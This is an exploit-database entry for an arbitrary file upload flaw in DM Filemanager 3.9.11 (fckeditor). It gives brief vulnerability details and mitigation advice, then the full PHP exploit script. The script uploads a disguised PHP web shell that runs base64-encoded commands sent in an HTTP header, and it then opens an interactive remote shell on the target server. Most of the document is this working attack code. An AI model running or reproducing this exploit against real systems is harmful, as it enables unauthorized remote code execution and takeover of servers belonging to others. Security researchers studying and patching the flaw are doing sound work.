header-logo
Suggest Exploit
vendor:
DM Filemanager
by:
eidelweiss
7.5
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: DM Filemanager
Affected Version From: 3.9.11
Affected Version To: 3.9.11
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Apache server with mod_mime module installed

DM Filemanager Remote Arbitrary File Upload Exploit

This exploit allows an attacker to remotely upload arbitrary files through the DM Filemanager (fckeditor) in version 3.9.11. The vulnerability lies in the 'config.php' file where the 'Enabled' parameter is set to true, allowing unauthorized file uploads. The exploit works on an Apache server with the mod_mime module installed.

Mitigation:

To mitigate this vulnerability, the vendor should release a patch that sets the 'Enabled' parameter to false by default. Users are advised to update to the latest version of DM Filemanager and ensure that the 'Enabled' parameter is set to false in the 'config.php' file.
Source

Exploit-DB raw data:

<?php
/*
 -----------------------------------------------------------------
 DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit
 -----------------------------------------------------------------
 Vendor: www.dutchmonkey.com
 Download : http://www.dutchmonkey.com/?file=downloads.html&label=Downloads
 exploited by ..: eidelweiss
 Affected: version 3.9.11 
 details..: works with an Apache server with the mod_mime module installed (if specific)
  
 [-] vulnerable code in /path/fckeditor/editor/filemanager/connectors/php/config.php
     
    [*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
    [*] 
    [*]	$Config['Enabled'] = true ;
    [*]
    [*] // Path to user files relative to the document root.
    [*] $Config['UserFilesPath'] = '/userfiles/' ;
    [*]
    [*] // Fill the following value it you prefer to specify the absolute path for the
    [*] // user files directory. Usefull if you are using a virtual directory, symbolic
    [*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
    [*] // Attention: The above 'UserFilesPath' must point to the same directory.
    [*] 
    [*]
    [*] $Config['AllowedExtensions']['File']	= array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
    [*] $Config['DeniedExtensions']['File']     = array() ;
    [*]
    [*] $Config['AllowedExtensions']['Image']   = array('bmp','gif','jpeg','jpg','png') ;
    [*] $Config['DeniedExtensions']['Image']    = array() ;
    [*]
    [*] $Config['AllowedExtensions']['Flash']   = array('swf','flv') ;
    [*] $Config['DeniedExtensions']['Flash']    = array() ;
    [*]
    [*] $Config['AllowedExtensions']['Media']   = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
    [*] $Config['DeniedExtensions']['Media']    = array() ;
     
    with a default configuration of this script, an attacker might be able to upload arbitrary
    files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
 
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
 $sock = fsockopen($host, 80);
 while (!$sock)
 {
  print "\n[-] No response from {$host}:80 Trying again...";
  $sock = fsockopen($host, 80);
 }
 fputs($sock, $packet);
 while (!feof($sock)) $resp .= fread($sock, 1024);
 fclose($sock);
 return $resp;
}
function upload()
{
 global $host, $path;
  
 $connector = "/fckeditor/editor/filemanager/connectors/php/config.php";
 $file_ext  = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");
  
 foreach ($file_ext as $ext)
 {
  print "\n[-] Trying to upload with .{$ext} extension...";
   
  $data  = "--abcdef\r\n";
  $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
  $data .= "Content-Type: application/octet-stream\r\n\r\n";
  $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
  $data .= "--abcdef--\r\n";
   
  $packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
  $packet .= "Host: {$host}\r\n";
  $packet .= "Content-Length: ".strlen($data)."\r\n";
  $packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
  $packet .= "Connection: close\r\n\r\n";
  $packet .= $data;
   
  preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
   
  if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
   
  $packet  = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
  $packet .= "Host: {$host}\r\n";
  $packet .= "Connection: close\r\n\r\n";
  $html    = http_send($host, $packet);
   
  if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
   
  sleep(1);
 }
  
 return false;
}
print "\n+--------------------------------------------------------------------------+";
print "\n| DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit |";
print "\n+--------------------------------------------------------------------------+\n";
if ($argc < 3)
{
 print "\nUsage......: php $argv[0] host path\n";
 print "\nExample....: php $argv[0] localhost /";
 print "\nExample....: php $argv[0] localhost /dm-filemanager/\n";
 die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
 print "\dm-filemanager-shell# ";
 $cmd = trim(fgets(STDIN));
 if ($cmd != "exit")
 {
  $packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
  $packet.= "Host: {$host}\r\n";
  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
  $packet.= "Connection: close\r\n\r\n";
  $html   = http_send($host, $packet);
  if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
  $shell = explode("_code_", $html);
  print "\n{$shell[1]}";
 }
 else break;
}
?>

Navigation

Suggest Exploit

Services By CQR